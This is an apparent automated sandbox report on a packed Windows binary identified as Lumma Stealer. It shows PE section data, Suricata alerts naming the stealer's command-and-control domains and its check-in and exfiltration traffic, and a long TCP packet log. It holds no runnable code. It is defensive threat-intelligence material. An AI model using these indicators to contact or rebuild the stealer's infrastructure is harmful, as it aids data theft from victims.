                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              xor bh, byte ptr [edx+56h]
                                                                                                                                                                                                                                              bound eax, dword ptr [edi+66h]
                                                                                                                                                                                                                                              jbe 00007F2830C5B91Ah
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              or eax, 506C720Ah
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              xor dword ptr fs:[ebp+62h], ecx
                                                                                                                                                                                                                                              arpl word ptr [esi], si
                                                                                                                                                                                                                                              inc esp
                                                                                                                                                                                                                                              jo 00007F2830C5B953h

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              0x10000x520000x26400d32e931c4549c2a67bae3dffe927b27bFalse0.9996361825980392data7.987306923457494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              0x550000x29c0000x20092148153a18e7fb8ed312911620c0a81unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              keznjtty0x2f10000x1970000x196600f8ea3f2388ba415c8d299fe184a6d996False0.9945888044063365data7.953745081857698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              slutevoy0x4880000x10000x400e13e795d3cdf56ecb24d4bb1399441afFalse0.7734375data6.087934491784486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .taggant0x4890000x30000x22001e5345e7247ecf532e42b16e7203bdf3False0.39246323529411764DOS executable (COM)4.110825112855058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              kernel32.dlllstrcpy

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2024-12-28T09:56:24.893279+01002058582ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz)1192.168.2.5612541.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.050344+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.5607541.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.192961+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.5574841.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.335802+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.5619601.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.477482+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.5641501.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.618979+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.5566571.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.766927+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.5642001.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:25.911826+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.5535921.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:26.054370+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.5579101.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-28T09:56:27.833768+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:28.598026+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:30.264241+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:30.996564+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:30.996564+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:32.278763+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:33.056715+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:33.056715+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:34.845788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:37.157974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:39.507854+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:42.555579+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549719104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:43.351379+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549719104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:45.440158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549731104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:45.444253+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549731104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-28T09:56:48.868512+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549738104.21.66.86443TCP

                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.437701941 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.437757015 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.437824965 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.440433979 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.440447092 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.833636045 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.833767891 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.837795973 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.837812901 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.838128090 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.883980989 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.887820959 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.931329966 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598068953 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598092079 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598134041 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598151922 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598182917 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598261118 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598285913 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598304033 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598334074 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770256042 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770323992 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770423889 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770451069 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770493984 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806453943 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806512117 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806535959 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806617022 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806651115 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808012009 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808036089 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808065891 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808073997 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956239939 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956286907 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956367016 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956726074 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956737995 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.264096022 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.264240980 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.267081976 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.267091990 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.267398119 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.268735886 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.268775940 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.268800974 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.996532917 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.996634960 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.996702909 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997463942 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997479916 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997493982 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997499943 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.020637035 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.020695925 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.020802975 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.021178961 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.021193027 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.278631926 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.278763056 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.285232067 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.285269976 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.285563946 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.287007093 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.287036896 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.287080050 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056737900 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056787968 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056823969 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056843996 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056860924 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056886911 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056906939 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056945086 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056978941 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056984901 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.065097094 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.065191984 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.065208912 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.073435068 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.073502064 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.073518991 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.118351936 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.118376970 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.165211916 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.258390903 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.261987925 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262069941 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262078047 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262119055 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262165070 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262185097 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262371063 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262398005 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262430906 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262447119 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262447119 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262454987 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262461901 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.625534058 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.625586033 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.625835896 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.626061916 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.626075983 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.845633030 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.845788002 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.847167969 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.847176075 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.847724915 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.848999023 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.849129915 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:34.849175930 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.763309956 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.763583899 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.763679028 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.763870955 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.763886929 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.900760889 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.900815964 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.900887012 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.901241064 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:35.901262045 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.157828093 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.157974005 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.159337044 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.159347057 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.159588099 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.161494970 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.161640882 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.161669016 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.161741018 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.203324080 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.990169048 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.990256071 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.990328074 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.990499973 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:37.990523100 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:38.205368996 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:38.205424070 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:38.205507040 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:38.205894947 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:38.205905914 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.507709980 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.507853985 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.509397984 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.509404898 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.509634018 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.510859966 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.511027098 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.511046886 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.511122942 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:39.511130095 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.526695967 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.526791096 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.526849031 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.527019978 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.527033091 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.935771942 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.935821056 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.935899019 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.936430931 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:40.936441898 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.555501938 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.555578947 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.557545900 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.557557106 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.557794094 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.565717936 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.565814972 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:42.565819979 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.351099968 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.351197004 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.351277113 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.351502895 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.351519108 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.883945942 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.884001970 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.884067059 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.884625912 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:43.884643078 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.439969063 CET44349731104.21.66.86192.168.2.5
